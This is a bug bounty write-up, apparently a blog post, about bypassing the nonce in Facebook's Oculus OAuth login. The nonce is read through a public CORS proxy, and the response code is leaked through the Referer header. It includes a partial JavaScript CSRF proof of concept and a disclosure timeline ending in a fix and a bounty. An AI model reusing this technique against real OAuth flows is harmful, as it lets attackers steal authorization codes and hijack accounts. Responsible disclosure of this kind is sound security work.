Bypass OAuth nonce and steal oculus response code

This post is about an bug that i found on Facebook Oculus Application OAuth which could have been used to bypass nonce and steal response_code

Image for post
Image for post

Recently Facebook made a Oauth login Feature for Oculus. that means the user can directly login to oculus using facebook account.but there is a nonce parameter in the URL. that i never seen in any other Oauth flow. so i started to dig deeper on it.

OAuth Authorisation URL for Facebook Oculus :

Request :

Response :,lonbrqie5fdwjD-x6jsnI5wnZ4XaDIRMixFoRqtQSne406BwOo2nSVS2o1MmmXkLW_zaW5Vy0SW6&state=d916afa3-3dc1-bab8-fc9d-3c8f44bfe7b7#_=_

The nonce act as CSRF token to prevent the user from CSRF attack.if the nonce value is not matched the Oauth request will get aborted . and does not follow the redirect_url.

In this Oauth flow i had two challenges :

1. Bypass nonce

2. Bypass redirect_url

Bypassing nonce is not that much easy. but i decided to make a try . after some testing i came to know nothing (Zero Progress).

when i Googled came to know about CORS Proxy. it is a free service for developers who need to bypass same-origin policy related to performing standard AJAX requests to 3rd party services.

There are some online Proxy servers:


when i passed the Oauth url in this proxy server it respond the source code of the given URL. when i searched for nonce in the source code can’t believe that both of the nonce value in real request and using this cors request are same.

So i bypassed the nonce now its time to bypass redirect url. then i started to explore but it made easy than i think.the below URL redirect the Response_code to my app domain using Referer leakage .

Now i Bypassed the both nonce and redirect_url . but to reproduce this all process with one click a CSRF POC to be created.

The Below code first make a cors request and get the nonce value in source code.finally combines the final_url + nonce in window.location and make a request.

var Cors_URL = "";
var Final_url = "";
var xhttp = new XMLHttpRequest();"GET", Cors_URL , true);
xhttp.onload = function() {
var str = xhttp.response.split("nonce=")[1];
var nonce = str.split("&")[0];
if (nonce.length == 0){
alert("Sorry! nonce not found..");
else {
alert("nonce : " + nonce);
Final_url = Final_url + nonce ;
window.location = Final_url ;


xhttp.onerror = function() {
alert("Please try again.");


Video POC:

To reproduce this bug the victim should be logged in both Facebook and oculus .because redirect_uri works only when the user is logged into his oculus account.

The Fix:

The leakage of nonce value in CORS Proxy and the redirect_uri in oculus to Facebook was fixed.


30-June-2017 : Report Sent

6-July-2017 : Facebook response that not able to reproduce the issue

6-July-2017 : Additional details provided by me

1-August-2017 : Further investigation by Facebook

10-August-2017: Fixed by Facebook

14-August-2017 : $10,000 bounty awarded by Facebook

Image for post
Image for post

Web Security Researcher

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store